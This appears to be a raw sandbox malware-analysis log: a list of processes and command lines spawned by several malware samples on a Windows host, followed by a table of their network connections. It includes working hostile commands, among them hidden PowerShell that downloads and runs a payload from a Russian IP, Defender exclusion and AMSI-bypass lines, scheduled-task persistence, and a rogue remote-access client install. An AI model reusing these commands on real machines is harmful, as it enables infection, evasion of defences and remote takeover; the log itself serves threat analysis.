"C:\Windows\TEMP\{2DF2633F-CAF2-430C-97E9-BD50B98E0239}\.cr\xmsn.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe" -burn.filehandle.attached=596 -burn.filehandle.self=592
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\MnCPLj3GUe7a.exe /sc onstart /ru SYSTEM /f
C:\Users\Admin\AppData\Local\Temp\a\Service.exe
"C:\Users\Admin\AppData\Local\Temp\a\Service.exe"
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Windows\TEMP\{B5B20FCE-A768-4E5C-BC1E-503282B5BB0E}\.ba\msn.exe
C:\Windows\TEMP\{B5B20FCE-A768-4E5C-BC1E-503282B5BB0E}\.ba\msn.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A31.tmp\5A32.tmp\5A33.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:'
C:\Drivers\MnCPLj3GUe7a.exe
"C:\Drivers\MnCPLj3GUe7a.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\download_dfaafbee649a66f8.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PhotoshopSetup.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RtkAudUService64.exe'
C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8472 -ip 8472
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 948
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Drivers\MnCPLj3GUe7a.exe
C:\Drivers\MnCPLj3GUe7a.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10337610101\7fb3004e1b.exe
"C:\Users\Admin\AppData\Local\Temp\10337610101\7fb3004e1b.exe"
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn XhWEBmaPjDE /tr "mshta C:\Users\Admin\AppData\Local\Temp\R7Sj9HpLl.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\R7Sj9HpLl.hta
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
C:\Users\Admin\AppData\Local\Temp\a\Build104.exe
"C:\Users\Admin\AppData\Local\Temp\a\Build104.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NWXTRRUFIOVCDPZS41FI8P5TYBDR3UET.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetupv-204827038.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetupv-204827038.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn XhWEBmaPjDE /tr "mshta C:\Users\Admin\AppData\Local\Temp\R7Sj9HpLl.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\372b209e3e76f5fc\ScreenConnect.ClientSetup.msi"
C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A312CBC617B2501886F9EF5CEF266749 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID126.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240702531 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 13560 -ip 13560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 13560 -s 916
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn XEOaemaaoQd /tr "mshta C:\Users\Admin\AppData\Local\Temp\9UpV8WfJx.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\9UpV8WfJx.hta
C:\Users\Admin\AppData\Local\Temp\a\si.exe
"C:\Users\Admin\AppData\Local\Temp\a\si.exe"
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
"C:\Users\Admin\AppData\Local\Temp\10337610101\7fb3004e1b.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'APF1VYUA0D5N7X09GEHSE6BXXGDKQFM0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe
"C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 9644 -ip 9644
C:\Windows\SYSTEM32\cmd.exe
cmd /c "botnet.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9644 -s 964
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn XEOaemaaoQd /tr "mshta C:\Users\Admin\AppData\Local\Temp\9UpV8WfJx.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "& { Add-MpPreference -ExclusionPath \"$env:TEMP\"; Add-MpPreference -ExclusionPath \"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\" }"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 9072 -ip 9072
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9072 -s 468
C:\Users\Admin\AppData\Local\TempNWXTRRUFIOVCDPZS41FI8P5TYBDR3UET.EXE
"C:\Users\Admin\AppData\Local\TempNWXTRRUFIOVCDPZS41FI8P5TYBDR3UET.EXE"
C:\Users\Admin\AppData\Local\Temp\10337630101\a3b38bfdd3.exe
"C:\Users\Admin\AppData\Local\Temp\10337630101\a3b38bfdd3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\TempAPF1VYUA0D5N7X09GEHSE6BXXGDKQFM0.EXE
"C:\Users\Admin\AppData\Local\TempAPF1VYUA0D5N7X09GEHSE6BXXGDKQFM0.EXE"
C:\Program Files\Google\Chrome\Application\ntladlklthawd.exe
"C:\Program Files\Google\Chrome\Application\ntladlklthawd.exe" -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHostsss'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\10337640101\bbcb1a84d6.exe
"C:\Users\Admin\AppData\Local\Temp\10337640101\bbcb1a84d6.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\ntladlklthawd.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\ntladlklthawd.exe" -
C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2726.tmp.bat""
C:\Program Files\taskhostw.exe
"C:\Program Files\taskhostw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp27F1.tmp.bat""
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); $field.SetValue($null,$true);"
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHostsss'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\timeout.exe
timeout /t 0.1 /nobreak
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8182D1FDB7F3C7EF3C6D4C53CC638F16
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9286EFADB2D90803672755AEC89A161F E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-urtop2-relay.screenconnect.com&p=443&s=73c2c562-1ab7-44a0-9101-522d9d85d29f&k=BgIAAACkAABSU0ExAAgAAAEAAQA9K7uS4%2fJVRDhzrMRt3pY6%2bxa%2fWKGgbJVaIahWYGuROtDJUZB8VSeD7DHf%2b8aOsnPl2CbtVbiJwbaD6nnXySt2YflS6XozE0%2f5hPBnLZJfYDCyrmEn0LXwquWOHOluXF8M7XU6gFJrHp%2feD6q5VGg%2bJ%2bCdmN%2bEY4Q%2blwhRQbdNWysuWl93nwX%2fdz9KA%2bK2YrFXwCUDTe7tw7ULGHizb%2fmpnhNUdEwU6J%2bZ11E7GrxtRf0yn2xVMBKTGmTmRmp51vBb2sfGIau4PatgWQrq0A4FnyPrBsvJKBkz2M%2fjTy4L7fWW0eTYcUkstqMaAe6tYvGNeOt0%2bOljpuYQK%2fsnaN%2fY"
C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.WindowsClient.exe" "RunRole" "1c84aeb6-9b08-44ac-bafe-fcc009adaffe" "User"
C:\Users\Admin\AppData\Local\Temp\10337650101\cb8b56657e.exe
"C:\Users\Admin\AppData\Local\Temp\10337650101\cb8b56657e.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AggregatorHostsss" /tr "C:\Users\Admin\AppData\Roaming\AggregatorHostsss"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4BF3.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Local\Temp\10337660101\c3156fcc20.exe
"C:\Users\Admin\AppData\Local\Temp\10337660101\c3156fcc20.exe"
C:\Users\Admin\AppData\Roaming\Minecraft.exe
"C:\Users\Admin\AppData\Roaming\Minecraft.exe"
C:\Users\Admin\AppData\Local\Temp\{59c864c0-f2fa-45ce-98f1-0bfd98ddbb44}\325d6e80.exe
"C:\Users\Admin\AppData\Local\Temp\{59c864c0-f2fa-45ce-98f1-0bfd98ddbb44}\325d6e80.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
C:\Users\Admin\AppData\Local\Temp\10337670101\57044dbafa.exe
"C:\Users\Admin\AppData\Local\Temp\10337670101\57044dbafa.exe"
C:\Users\Admin\AppData\Local\Temp\{d371e5ce-6dc2-43ce-995c-54e38b1f6933}\7b1568c5.exe
C:/Users/Admin/AppData/Local/Temp/{d371e5ce-6dc2-43ce-995c-54e38b1f6933}/\7b1568c5.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10337680101\b1e45333d9.exe
"C:\Users\Admin\AppData\Local\Temp\10337680101\b1e45333d9.exe"
C:\Drivers\MnCPLj3GUe7a.exe
C:\Drivers\MnCPLj3GUe7a.exe
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 5555.kl.com.ua | udp |
| NL | 5.79.66.145:80 | 5555.kl.com.ua | tcp |
| NL | 5.79.66.145:80 | 5555.kl.com.ua | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | rottot.shop | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | impactsupport.world | udp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | nestlecompany.world | udp |
| US | 8.8.8.8:53 | mercharena.biz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | generalmills.pro | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | stormlegue.com | udp |
| US | 173.255.204.62:443 | stormlegue.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | blast-hubs.com | udp |
| US | 173.255.204.62:443 | blast-hubs.com | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | jmucha.fun | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 149.255.35.125:443 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | blastikcn.com | udp |
| US | 173.255.204.62:443 | blastikcn.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | niggahunter-28633.portmap.io | udp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | nestlecompany.pro | udp |
| US | 8.8.8.8:53 | lestagames.world | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.96.50:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | smtp.gmail.com | udp |
| BE | 142.251.173.109:587 | smtp.gmail.com | tcp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| GB | 104.245.241.219:80 | 104.245.241.219 | tcp |
| US | 8.8.8.8:53 | jmucha.fun | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | gitlab.com | udp |
| US | 172.65.251.78:443 | gitlab.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| KR | 175.112.170.177:80 | 175.112.170.177 | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| US | 8.8.8.8:53 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | udp |
| US | 162.159.140.237:443 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | tcp |
| NL | 195.211.191.93:80 | 195.211.191.93 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 107.174.192.179:80 | 107.174.192.179 | tcp |
| US | 162.159.140.237:443 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.26.1.100:443 | get.geojs.io | tcp |
| US | 172.245.208.13:80 | 172.245.208.13 | tcp |
| US | 162.159.140.237:443 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | tcp |
| FR | 185.136.161.124:6128 | tcp | |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| BE | 142.251.173.109:587 | smtp.gmail.com | tcp |
| DE | 193.233.254.162:5555 | tcp | |
| US | 8.8.8.8:53 | niggahunter-28633.portmap.io | udp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| DE | 193.233.254.162:5555 | tcp | |
| DE | 193.233.254.162:5556 | tcp | |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| US | 107.174.192.179:80 | 107.174.192.179 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.99:80 | 45.144.212.99 | tcp |
| NL | 45.144.212.99:80 | 45.144.212.99 | tcp |
| US | 82.29.67.160:443 | tcp | |
| US | 172.245.208.13:80 | 172.245.208.13 | tcp |
| US | 172.245.208.13:80 | 172.245.208.13 | tcp |
| US | 8.8.8.8:53 | grabify.link | udp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 107.174.192.179:80 | 107.174.192.179 | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 82.29.67.160:443 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 89.208.104.175:5000 | tcp | |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| US | 8.8.8.8:53 | rottot.shop | udp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 198.135.52.171:4433 | tcp | |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| US | 107.174.192.179:80 | 107.174.192.179 | tcp |
| CH | 179.43.159.186:7005 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 82.29.67.160:443 | tcp | |
| US | 82.29.67.160:443 | tcp | |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| BE | 142.251.173.109:587 | smtp.gmail.com | tcp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | jmucha.fun | udp |
| US | 8.8.8.8:53 | www.zoommeetspace.com | udp |
| US | 66.33.60.35:443 | www.zoommeetspace.com | tcp |
| AU | 1.1.1.1:443 | udp | |
| AU | 1.1.1.1:443 | udp | |
| US | 104.21.84.111:443 | udp | |
| FR | 185.136.161.124:8761 | tcp | |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| CH | 179.43.159.186:7005 | tcp | |
| US | 8.8.8.8:53 | www.wesco-distributors.com | udp |
| US | 76.76.21.164:443 | www.wesco-distributors.com | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| GB | 216.58.213.14:443 | docs.google.com | tcp |
| US | 82.29.67.160:443 | tcp | |
| US | 82.29.67.160:443 | tcp | |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.179.227:80 | o.pki.goog | tcp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| RU | 45.93.20.224:80 | 45.93.20.224 | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| DE | 176.65.138.157:80 | 176.65.138.157 | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| CH | 179.43.159.186:7005 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 176.65.138.157:80 | 176.65.138.157 | tcp |
| US | 8.8.8.8:53 | devbuilds.s.kaspersky-labs.com | udp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| US | 8.8.8.8:53 | www.periqi.com | udp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 76.76.21.98:443 | www.periqi.com | tcp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| DE | 80.239.169.147:443 | devbuilds.s.kaspersky-labs.com | tcp |
| US | 198.135.52.171:4433 | tcp | |
| US | 82.29.67.160:443 | tcp | |
| US | 82.29.67.160:443 | tcp | |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| DE | 176.65.138.157:80 | 176.65.138.157 | tcp |
| CH | 179.43.159.186:7005 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 176.65.138.157:1443 | tcp | |
| CN | 39.104.25.13:8111 | tcp | |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| FR | 51.77.7.204:443 | tcp | |
| US | 104.26.9.202:443 | grabify.link | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 82.29.67.160:443 | tcp | |
| US | 82.29.67.160:443 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 185.156.73.98:80 | 185.156.73.98 | tcp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
